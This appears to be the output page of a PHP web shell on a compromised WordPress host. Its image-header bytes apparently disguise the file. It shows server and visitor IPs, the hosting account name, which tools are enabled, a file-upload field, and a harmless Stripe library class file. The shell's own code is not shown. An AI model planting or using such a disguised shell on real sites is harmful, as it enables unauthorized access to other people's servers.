????JFIF??x?x????'
Server IP : 104.21.96.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/cwd/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/ |
Upload File : |
<?php namespace WPForms\Vendor\Stripe; /** * ThinEvent represents the json that's delivered from an Event Destination. * It's a basic class with no additional methods or properties. Use it to check basic information about a delivered event. * If you want more details, use `$stripeClient->v2->core->events->retrieve(thin_event.id)` to fetch the full event object. * * @property string $id Unique identifier for the event. * @property string $type The type of the event. * @property string $created Time at which the object was created. * @property null|string $context Authentication context needed to fetch the event or related object. * @property null|RelatedObject $related_object Object containing the reference to API resource relevant to the event. * @property null|Reason $reason Reason for the event. * @property bool $livemode Livemode indicates if the event is from a production(true) or test(false) account. */ class ThinEvent { public $id; public $type; public $created; public $context; public $related_object; public $reason; public $livemode; }